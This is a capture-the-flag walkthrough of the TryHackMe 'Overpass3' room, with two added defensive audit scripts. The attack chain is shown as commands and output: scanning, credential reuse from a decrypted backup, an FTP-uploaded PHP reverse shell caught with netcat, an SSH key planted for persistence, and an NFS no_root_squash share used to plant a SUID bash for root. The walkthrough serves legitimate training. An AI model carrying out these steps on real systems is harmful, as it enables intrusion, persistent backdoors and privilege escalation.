Overpass3
Overpass3 is a free room on TryHackMe created by NinjaJc01. It revolves around a story following the Overpass team’s rocky start in infosec and their failed ventures in Overpass and Overpass2.
For this room, the Overpass team has made a web hosting company. Despite this achievement, they seem not to have learnt from their past mistakes and their main web server is extremely vulnerable.
For this room, we are to discover and exploit these vulnerabilities and obtain 3 flags: the Web Flag, the User Flag and the Root Flag.
Analysing the homepage as part of our reconnaissance, we discover possible users that may be useful for account discovery:
- Paradox
- Elf
- MuirlandOracle
- NinjaJc01
In addition, we can perform a scan for services on the server to identify any open ports. We can use rustscan to quickly discover the ports, followed by nmap against the discovered ports to find out any additional information:
> rustscan -a $IP -r 1-65535 -- -sC -sV
Open 10.10.77.223:21
Open 10.10.77.223:22
Open 10.10.77.223:80
....
# Nmap 7.91 scan initiated Fri Jun 18 19:27:40 2021 as: nmap -vvv -p 21,22,80 -sC -sV -oN scan_results.nmap 10.10.77.223
Nmap scan report for 10.10.77.223
Host is up, received syn-ack (0.19s latency).
Scanned at 2021-06-18 19:27:42 EAT for 14s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| ssh-rsa ....
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAPAji9Nkb2U9TeP47Pz7BEa943WGOeu5XrRrTV0+CS0eGfNQyZkK6ZICNdeov65c2NWFPFsZTFjO8Sg+e2n/lM=
| 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM/U6Td7C0nC8tiqS0Eejd+gQ3rjSyQW2DvcN0eoMFLS
80/tcp open http syn-ack Apache httpd 2.4.37 ((centos))
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 18 19:27:56 2021 -- 1 IP address (1 host up) scanned in 16.51 seconds
From the above scans, we notice FTP (21), SSH (22) and HTTP (80) services running on the server.
We also run a directory search to see whether there are any hidden directories on the server, and come across a backups folder containing a backup file, which we can download and examine with a zip utility (I used 7-Zip).
> gobuster dir -u $IP --wordlist /usr/share/wordlists/dirb/big.txt -o dir_search.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.77.223
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/18 19:32:24 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 218]
/.htaccess (Status: 403) [Size: 218]
/backups (Status: 301) [Size: 237] [--> http://10.10.77.223/backups/]
/cgi-bin/ (Status: 403) [Size: 217]
===============================================================
2021/06/18 19:39:24 Finished
===============================================================
> wget http://$IP/backups/backup.zip
> 7z l backup.zip # Examine the contents of the file using the 7-Zip utility.
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz (806EC),ASM,AES-NI)
Scanning the drive for archives:
1 file, 13353 bytes (14 KiB)
Listing archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 13353
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-09 00:18:15 ..... 10366 10366 CustomerDetails.xlsx.gpg
2020-11-09 00:16:38 ..... 3522 2645 priv.key
------------------- ----- ------------ ------------ ------------------------
2020-11-09 00:18:15 13888 13011 2 files
> unzip backup.zip # Unzip the contents.
We notice that we have an encrypted Excel file along with the private key it was encrypted for. To read the Excel file, we import the key with the gpg utility, decrypt the file, and open it in a spreadsheet application (e.g. Microsoft Excel or LibreOffice). For my example, I converted the Excel file to CSV so that I could examine it in the terminal.
> gpg --import priv.key # Import the key for gpg use.
> gpg -o CustomerDetails.xlsx -d CustomerDetails.xlsx.gpg # Decrypt the encrypted Excel file.
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
"Paradox <paradox@overpass.thm>"
# Optionally, I used the tool xlsx2csv.py to convert the xlsx file to a CSV and output the contents to the console.
> python xlsx2csv.py CustomerDetails.xlsx > CustomerDetails.csv
> cat CustomerDetails.csv
Customer Name,Username,Password,Credit card number,CVC
Par. A. Doxx,paradox,ShibesAreGreat123,4111 1111 4555 1142,432
0day Montgomery,0day,OllieIsTheBestDog,5555 3412 4444 1115,642
Muir Land,muirlandoracle,A11D0gsAreAw3s0me,5103 2219 1119 9245,737
From the Excel file, we can see usernames and passwords for a number of users. Logging in to the FTP service with paradox's credentials, we notice that the directory listing matches what is served by the web server; that is, the website and its additional folders are hosted from the directory paradox's FTP account lands in.
We can test whether we can upload files to the server via the FTP account. If that is possible, we can hypothesise that we can upload a reverse shell and then trigger it via the browser.
# Let's create a basic file and try and upload it to the server.
> touch test.txt
> ftp $IP 21
Connected to 10.10.234.16.
220 (vsFTPd 3.0.3)
Name (10.10.234.16:bob): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 48 48 24 Nov 08 2020 backups
-rw-r--r-- 1 0 0 65591 Nov 17 2020 hallway.jpg
-rw-r--r-- 1 0 0 1770 Nov 17 2020 index.html
-rw-r--r-- 1 0 0 576 Nov 17 2020 main.css
-rw-r--r-- 1 0 0 2511 Nov 17 2020 overpass.svg
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
## Seems the upload was successful.
## We can upload a customized reverse shell (php-reverse-shell.php from pentestmonkey usually works well).
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (36.6398 MB/s)
ftp> bye
221 Goodbye.
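An added defender-side check, which is not code from the room or from this write-up: the upload above succeeds because the FTP account lands in the web root with write access, and Apache executes any PHP placed there. The script below parses a directory listing in the `ls -l` format the FTP session printed, takes the uid/gid an FTP login maps to, and reports everything that login could modify or create in, plus any server-side scripts already present. The `.` entry, the uid 1001 for paradox and the uploaded shell.php in the sample listing are constructed; the same classification also runs over a live directory tree so it can be scheduled on the web server itself.

```python
"""Audit a web root for the write-access weakness behind the FTP upload above.

Added defender-side example; not code from the room or the original write-up.
The uid 1001 for paradox, the `.` entry and the shell.php line are constructed.
"""
import os
import re
import stat

# Constructed listing: the files from the FTP session, plus the web root itself
# (owned by the FTP account) and the shell.php that the room ends up uploading.
SAMPLE_LISTING = """\
drwxr-xr-x 3 1001 1001 112 Jun 21 2021 .
drwxr-xr-x 2 48 48 24 Nov 08 2020 backups
-rw-r--r-- 1 0 0 65591 Nov 17 2020 hallway.jpg
-rw-r--r-- 1 0 0 1770 Nov 17 2020 index.html
-rw-r--r-- 1 0 0 576 Nov 17 2020 main.css
-rw-r--r-- 1 0 0 2511 Nov 17 2020 overpass.svg
-rw-r--r-- 1 1001 1001 5494 Jun 21 2021 shell.php
"""

SCRIPT_EXTS = (".php", ".phtml", ".cgi", ".pl", ".py")

# mode links uid gid size Mon DD YYYY-or-HH:MM name
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<uid>\d+)\s+(?P<gid>\d+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def parse_mode(mode: str) -> int:
    """Convert an ls mode string such as 'drwxr-xr-x' into st_mode permission bits."""
    bits = 0
    triplets = (
        (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_ISUID),
        (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP, stat.S_ISGID),
        (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH, stat.S_ISVTX),
    )
    for i, (r, w, x, special) in enumerate(triplets):
        chunk = mode[1 + 3 * i: 4 + 3 * i]
        if chunk[0] == "r":
            bits |= r
        if chunk[1] == "w":
            bits |= w
        if chunk[2] in "xst":
            bits |= x
        if chunk[2] in "sStT":
            bits |= special
    return bits


def writable_by(bits, owner_uid, owner_gid, uid, gid) -> bool:
    """Plain POSIX discretionary check for the write bit (root writes anything)."""
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(bits & stat.S_IWUSR)
    if gid == owner_gid:
        return bool(bits & stat.S_IWGRP)
    return bool(bits & stat.S_IWOTH)


def classify(name, is_dir, bits, owner_uid, owner_gid, uid, gid):
    """Return (kind, name) findings for one entry."""
    findings = []
    if writable_by(bits, owner_uid, owner_gid, uid, gid):
        # A writable directory lets the account drop new files (such as a .php
        # file); a writable file lets it rewrite content the server already serves.
        findings.append(("create" if is_dir else "modify", name))
    if not is_dir and name.lower().endswith(SCRIPT_EXTS):
        findings.append(("script", name))
    return findings


def audit_listing(listing: str, uid: int, gid: int):
    """Run classify() over every parsable line of an `ls -l` listing."""
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        if not m:
            continue  # 'total 12', FTP status lines and other non-entries
        is_dir = m.group("mode")[0] == "d"
        findings += classify(m.group("name"), is_dir, parse_mode(m.group("mode")),
                             int(m.group("uid")), int(m.group("gid")), uid, gid)
    return findings


def audit_directory(root: str, uid: int, gid: int):
    """Same checks against a live tree, for running on the web server itself."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        st = os.lstat(dirpath)
        findings += classify(os.path.relpath(dirpath, root), True, st.st_mode,
                             st.st_uid, st.st_gid, uid, gid)
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            st = os.lstat(path)
            findings += classify(os.path.relpath(path, root), False, st.st_mode,
                                 st.st_uid, st.st_gid, uid, gid)
    return findings


def demo_live_audit():
    """Build a throwaway web root in a temp dir and audit it as the current user."""
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        open(os.path.join(root, "shell.php"), "w").close()  # empty constructed file
        return audit_directory(root, os.getuid(), os.getgid())


if __name__ == "__main__":
    for kind, name in audit_listing(SAMPLE_LISTING, 1001, 1001):
        print(f"{kind:7} {name}")
```

Run as paradox's uid the audit flags the web root itself as a place new files can be created, which is exactly what made the shell upload possible; run as the apache uid (48) it flags only the backups directory, which is why the web flag later turns up under a path the apache user can read rather than in the web root.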
With the shell uploaded, we start a listener on the attacker machine and trigger the reverse shell by requesting the uploaded file from the web server.
# Establish listener on the attacker machine.
> nc -nlvp 4444
# Output on the attacker machine on triggering the php reverse shell script on the webserver.
listening on [any] 4444 ...
connect to [10.11.16.238] from (UNKNOWN) [10.10.234.16] 36022
Linux ip-10-10-234-16 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
16:29:30 up 20 min, 0 users, load average: 0.00, 0.00, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (885): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ whoami
whoami
apache
sh-4.4$
Given that the apache user has limited privileges, we can reuse paradox's password (password recycling) to move laterally into paradox's account and gain his privileges. To maintain access, we can add an SSH key to his authorized_keys file so that we can SSH into his account.
# Let's su into paradox's account and go into his .ssh folder
> su paradox
Password:
> cd ~/.ssh/
> ls
authorized_keys
id_rsa.pub
# Create an RSA key on your attacking machine and append it to the 'authorized_keys' file.
> echo 'Put your key in here' | tee -a authorized_keys
# Now SSH into paradox's account using the private key from the attacker machine.
> ssh -i overpass3_rsa paradox@$IP
The authenticity of host '10.10.190.229 (10.10.190.229)' can't be established.
ECDSA key fingerprint is SHA256:Zc/Zqa7e8cZI2SP2BSwt5iLz5wD3XTxIz2SLZMjoJmE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.190.229' (ECDSA) to the list of known hosts.
Last login: Mon Jun 21 08:13:05 2021
[paradox@ip-10-10-190-229 ~]$
Perform a quick ‘find’ to search for the web flag.
> find / -name "*flag*" 2>/dev/null
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/vif-0/net/eth0/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/bin/pflags
/usr/sbin/grub2-set-bootflag
/usr/share/man/man1/grub2-set-bootflag.1.gz
/usr/share/httpd/web.flag
> cat /usr/share/httpd/web.flag
txx{xxxxxxxxxxxxxxxxxxxxxxxxxx} # Found the web flag. No spoilers!
We can use the linpeas.sh script to find potential privilege escalation avenues. We upload the script from our attack machine and execute it on the victim machine:
#Upload the script using SCP
> scp -i overpass3_rsa linpeas.sh paradox@10.10.190.229:/home/paradox/linpeas.sh
linpeas.sh 100% 333KB 148.3KB/s 00:02
# Run the script
> chmod +x linpeas.sh && ./linpeas.sh
... # [truncated output]
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
... # [truncated output]
Running the script shows an interesting NFS share that is insecurely exported (rw, no_root_squash and insecure, to any client). We can try to mount it directly on the attacker machine; however, running showmount shows that our attacker machine cannot reach the victim over NFS, which matches the full port scan earlier, where only 21, 22 and 80 were open.
To resolve this, we create a tunnel. Since we already have an SSH backdoor into paradox's account, we can use it for the tunnel:
# From the attacker machine
> showmount -e $IP
clnt_create: RPC: Unknown host # Seems we can't do an NFS mount directly to our attacker machine.
# On the victim machine, determine which port NFS is listening on
> rpcinfo -p
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
#... [truncated]
100003 3 tcp 2049 nfs # Seems to be running on 2049 over tcp
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100021 1 udp 50798 nlockmgr
100021 3 udp 50798 nlockmgr
#... [truncated]
# Back on the attacker machine, we establish a tunnel and subsequently mount the share
> ssh -i overpass3_rsa paradox@10.10.190.229 -L 2049:localhost:2049
> mkdir -p /tmp/james && sudo mount -t nfs localhost:/ /tmp/james
> cd /tmp/james
> cat user.flag
txx{xxxxxxxxxxxxxxxxxxxxxxxxxx} #I've masked the flag
> ls -la .ssh # We can also see we have access to James' ssh keys which we can copy and use.
total 12
drwx------ 2 bob bob 61 Nov 8 2020 .
drwx------ 3 bob bob 112 Jun 21 12:48 ..
-rw------- 1 bob bob 581 Nov 8 2020 authorized_keys
-rw------- 1 bob bob 2610 Nov 8 2020 id_rsa
-rw-r--r-- 1 bob bob 581 Nov 8 2020 id_rsa.pub
Because the export uses no_root_squash, files created by root on the client are owned by root on the server, so a SUID-root copy of bash placed in the share runs as root when executed there. We replicate this by copying bash into the share as root on the attacker machine and setting the SUID bit, then logging into james' account via SSH (given that we have his SSH keys) and executing the copied bash with the '-p' option.
# In the mounted share on the attacker machine, copy the bash binary as the attacker's root user and set the SUID bit.
> cp /bin/bash /tmp/james && chmod +s /tmp/james/bash
# As we can see James' ssh keys, let's do an SSH directly from the share using his keys.
> ssh -i .ssh/id_rsa james@$IP
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
[james@ip-10-10-190-229 ~]$
# Lastly, run the copied bash binary with the '-p' option so it keeps the root privileges.
> ./bash -p
# # [We got root!]
> cat /root/root.flag
txxx{xxxxxxxxxxxxxxxxxxxxxxxx} # Hidden flag
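An added defender-side counterpart to the NFS finding above and to the SUID-bash escalation it enabled; this is not code from the room, linpeas or this write-up. It parses /etc/exports text and flags the options that weaken the defaults (no_root_squash, insecure, rw, wildcard clients), parses /proc/mounts text for NFS mounts that lack nosuid/noexec on the client side, and walks an exported directory for set-uid or set-gid files. The sample exports and mounts text is constructed; the /home/james line is the export linpeas reported in the room.

```python
"""Detect the NFS export weakness that turned a file share into a root shell.

Added defender-side example; not code from the room or from linpeas.
  audit_exports(text) - parse /etc/exports text and flag risky options
  audit_mounts(text)  - parse /proc/mounts text and flag NFS mounts without nosuid/noexec
  find_suid(root)     - walk an exported directory and list set-uid/set-gid files
"""
import os
import re
import stat

# Constructed /etc/exports: the room's export plus a sane one for contrast.
SAMPLE_EXPORTS = """\
# constructed /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/srv/public 10.0.0.0/24(ro,sync,root_squash)
"""

# Constructed /proc/mounts lines: the tunnelled mount from the room and a hardened one.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
localhost:/ /tmp/james nfs4 rw,relatime,vers=4.2,proto=tcp,port=2049 0 0
fileserver:/data /mnt/data nfs rw,nosuid,noexec,relatime 0 0
"""

# One client spec: host or network, optionally followed by (opt,opt,...)
CLIENT_SPEC = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")


def audit_exports(text):
    """Return (path, host, reason) tuples for exports that weaken the NFS defaults.

    NFS defaults to root_squash and secure; overriding both on an rw export open
    to every client (the room's exact line) lets any client that can reach the
    port write root-owned set-uid files into the export.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split(None, 1)
        if len(parts) < 2:
            continue  # blank, comment, or an export with no clients at all
        path, clients = parts
        for spec in CLIENT_SPEC.finditer(clients):
            host = spec.group("host")
            opts = {o for o in (spec.group("opts") or "").split(",") if o}
            if "no_root_squash" in opts:
                findings.append((path, host, "no_root_squash: client root is root on the server"))
            if "insecure" in opts:
                findings.append((path, host, "insecure: requests from unprivileged ports accepted"))
            if host in ("*", "0.0.0.0/0"):
                findings.append((path, host, "exported to every client"))
            if {"rw", "no_root_squash"} <= opts:
                findings.append((path, host, "rw + no_root_squash: set-uid binaries can be planted"))
    return findings


def audit_mounts(text):
    """Return (mountpoint, missing options) for NFS mounts lacking nosuid/noexec.

    This is the client-side half: a share mounted with nosuid makes a planted
    set-uid bash run as the caller instead of as its owner.
    """
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[2] not in ("nfs", "nfs4"):
            continue
        opts = set(parts[3].split(","))
        missing = sorted({"nosuid", "noexec"} - opts)
        if missing:
            findings.append((parts[1], missing))
    return findings


def find_suid(root):
    """List (relative path, owner uid) of regular files with set-uid or set-gid set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((os.path.relpath(path, root), st.st_uid))
    return hits


def demo_find_suid():
    """Create an empty set-uid marker file in a temp dir and confirm find_suid reports it."""
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "bash")
        open(path, "w").close()   # constructed empty file, not a real binary
        os.chmod(path, 0o4755)    # set-uid bit; permitted on a file the caller owns
        return find_suid(root)


if __name__ == "__main__":
    for path, host, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"export {path} to {host}: {reason}")
    for mountpoint, missing in audit_mounts(SAMPLE_MOUNTS):
        print(f"mount {mountpoint}: missing {','.join(missing)}")
```

On the server, audit_exports over the real /etc/exports and find_suid over /home/james would have flagged both the export line and the planted bash; on any client, audit_mounts over /proc/mounts shows which shares are mounted without nosuid.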
And that about wraps up the room. It's a really good room, though the NFS tripped me up a bit. One note: when copying the bash file, make sure you are logged in as root on the attacker machine, otherwise the file will not be saved in the share with the necessary root ownership.